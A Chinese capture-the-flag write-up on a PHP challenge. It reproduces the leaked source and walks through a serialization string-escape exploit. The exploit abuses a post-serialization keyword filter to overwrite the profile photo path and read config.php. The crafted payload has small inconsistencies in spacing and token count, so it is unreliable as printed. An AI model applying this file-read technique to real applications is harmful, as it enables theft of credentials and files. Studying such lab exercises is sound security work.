主页。访问任何东西都返回200。这就很难受了。扫描器都用不了
照常。有登陆就有注册。
注册个用户登陆。但是单引号双引号斜杠都被过滤。那应该是没注入了
又有三个框框。一个文件上传。注入都被过滤了。
文件上传。会将文件内容以Base64加密输出
一时没了思路。后来才知道。有个www.zip。。。。看回显200都忘了手工测试
- config.php
<?php
$config['hostname'] = '127.0.0.1';
$config['username'] = 'root';
$config['password'] = '';
$config['database'] = '';
$flag = '';
#flag存放地址
?>
- index.php
<?php
require_once('class.php');
if($_SESSION['username']) {
header('Location: profile.php');
exit;
}
if($_POST['username'] && $_POST['password']) {
$username = $_POST['username'];
$password = $_POST['password'];
if(strlen($username) < 3 or strlen($username) > 16)
die('Invalid user name');
if(strlen($password) < 3 or strlen($password) > 16)
die('Invalid password');
if($user->login($username, $password)) {
$_SESSION['username'] = $username;
header('Location: profile.php');
exit;
}
else {
die('Invalid user name or password');
}
}
else {
?>
- register.php
<?php
require_once('class.php');
if($_POST['username'] && $_POST['password']) {
$username = $_POST['username'];
$password = $_POST['password'];
if(strlen($username) < 3 or strlen($username) > 16)
die('Invalid user name');
if(strlen($password) < 3 or strlen($password) > 16)
die('Invalid password');
if(!$user->is_exists($username)) {
$user->register($username, $password);
echo 'Register OK!<a href="index.php">Please Login</a>';
}
else {
die('User name Already Exists');
}
}
else {
?>
- update.php
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {
$username = $_SESSION['username'];
if(!preg_match('/^\d{11}$/', $_POST['phone']))
die('Invalid phone');
if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
die('Invalid email');
if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
die('Invalid nickname');
$file = $_FILES['photo'];
if($file['size'] < 5 or $file['size'] > 1000000)
die('Photo size error');
move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);
$user->update_profile($username, serialize($profile));
echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
}
else {
?>
- profile.php
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
$username = $_SESSION['username'];
$profile=$user->show_profile($username);
if($profile == null) {
header('Location: update.php');
}
else {
$profile = unserialize($profile);
$phone = $profile['phone'];
$email = $profile['email'];
$nickname = $profile['nickname'];
$photo = base64_encode(file_get_contents($profile['photo']));
?>
- class.php
<?php
require('config.php');
class user extends mysql{
private $table = 'users';
public function is_exists($username) {
$username = parent::filter($username);
$where = "username = '$username'";
return parent::select($this->table, $where);
}
public function register($username, $password) {
$username = parent::filter($username);
$password = parent::filter($password);
$key_list = Array('username', 'password');
$value_list = Array($username, md5($password));
return parent::insert($this->table, $key_list, $value_list);
}
public function login($username, $password) {
$username = parent::filter($username);
$password = parent::filter($password);
$where = "username = '$username'";
$object = parent::select($this->table, $where);
if ($object && $object->password === md5($password)) {
return true;
} else {
return false;
}
}
public function show_profile($username) {
$username = parent::filter($username);
$where = "username = '$username'";
$object = parent::select($this->table, $where);
return $object->profile;
}
public function update_profile($username, $new_profile) {
$username = parent::filter($username);
$new_profile = parent::filter($new_profile);
$where = "username = '$username'";
return parent::update($this->table, 'profile', $new_profile, $where);
}
public function __tostring() {
return __class__;
}
}
class mysql {
private $link = null;
public function connect($config) {
$this->link = mysql_connect(
$config['hostname'],
$config['username'],
$config['password']
);
mysql_select_db($config['database']);
mysql_query("SET sql_mode='strict_all_tables'");
return $this->link;
}
public function select($table, $where, $ret = '*') {
$sql = "SELECT $ret FROM $table WHERE $where";
$result = mysql_query($sql, $this->link);
return mysql_fetch_object($result);
}
public function insert($table, $key_list, $value_list) {
$key = implode(',', $key_list);
$value = '\'' . implode('\',\'', $value_list) . '\'';
$sql = "INSERT INTO $table ($key) VALUES ($value)";
return mysql_query($sql);
}
public function update($table, $key, $value, $where) {
$sql = "UPDATE $table SET $key = '$value' WHERE $where";
return mysql_query($sql);
}
public function filter($string) {
$escape = array('\'', '\\\\');
$escape = '/' . implode('|', $escape) . '/';
$string = preg_replace($escape, '_', $string);
$safe = array('select', 'insert', 'update', 'delete', 'where');
$safe = '/' . implode('|', $safe) . '/i';
return preg_replace($safe, 'hacker', $string);
}
public function __tostring() {
return __class__;
}
}
session_start();
$user = new user();
$user->connect($config);
代码又臭又长直接说下代码的作用
index.php:
接收用户名密码。传入user类的login函数。经过次次过滤。赋值给session['username']
register.php:
接收。传入user类register函数。过滤。insert数据库
update.php:
传入phone/email/nickname/photo
用preg_match匹配
phone限制了11位数字
email限制了a-z0-9A-Z_@xx.com
nickname限制了a-zA-Z0-9
文件上传没啥限制。md5文件名。访问就直接下载
将上面的四个值。放入$profile中。传入user类的update_profile函数
update_profile($username,serialize($profile))
序列化用户信息的数组。然后进行过滤。插入数据库。
这里看看具体的过滤代码。将单引号和斜杠替换为下划线。select/insert/update/delete/where替换为hacker
profile.php:
首先通过User类的show_profile函数,通过username从数据库中返回$profile,也就是用户信息的数组,如果为null(第一次登陆)就跳转到update.php。进行上述的更新数组操作
不为NULL。
反序列化数组。然后再分给每个变量。最后图片处。base64_encode(file_get_contents($profile['photo']));
看到这。就很简单了。
注册登陆。用户信息序列化->数据库->取出反序列化->读取数组中photo的值
那么我们只要控制photo的值为config.php就能读取到flag。那么我们就要控制序列化的内容
唯一可控的就是我们插入数据库的那部分代码。后面都是取出。读取了。没办法控制
preg_match。这种比较函数。都可以通过数组绕过。我们模拟下代码
<?php
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/';
#模拟请求
print_r($profile);
echo "<br />";
print_r(serialize($profile));
#输出序列化内容。这里要插入数据库的
?>
这里序列化的内容变成了Array。说明是可以正常传入的
进入下一步。替换
将危险字符都替换为hack。但是。这是在序列化后替换。而序列化定义的长度并没有变化
比如s:8:"nickname";s:5:"where"经过替换后就成了s:8:"nickname";s:6:"hacker"
hacker就会往后多读1位。那么如果我们闭合nickname的数组。使nickname长度中。包含了我们闭合数组的恶意代码。然后通过替换后。由于hacker比where多一位。替换多次后。就可以成功对应nickname的长度
还是看图比较易懂
由于数组的是个数组。我们只要输入红框内的字符。即可闭合。成为一个正常的序列化字符串。具体的序列化在之前的文章中有讲
字符串+闭合代码
a:4:{s:5:"phone";s:11:"13333333333";s:5:"email";s:10:"123@qq.com";s:8:"nickname";a:1:{i:0;s:187:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5: "photo";s:10:"config.php";}s:5:"photo";s:7:"upload/";}
#where+";}s:5: "photo";s:10:"config.php总长187
a:4:{s:5:"phone";s:11:"13333333333";s:5:"email";s:10:"123@qq.com";s:8:"nickname";a:1:{i:0;s:187:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";}s:5: "photo";s:10:"config.php";}s:5:"photo";s:7:"upload/";}
#替换后。hack占了187。我们输入的";}s:5: "photo";s:10:"config.php成功闭合了数组。使photo参数变成了我们的数据
主要就是利用序列化它的长度是定死的。一开始的187。是我们的where和闭合数组的代码。
后来替换为hacker后。187就成了hacker。闭合数组的代码就逃逸出来了。
拿到flag
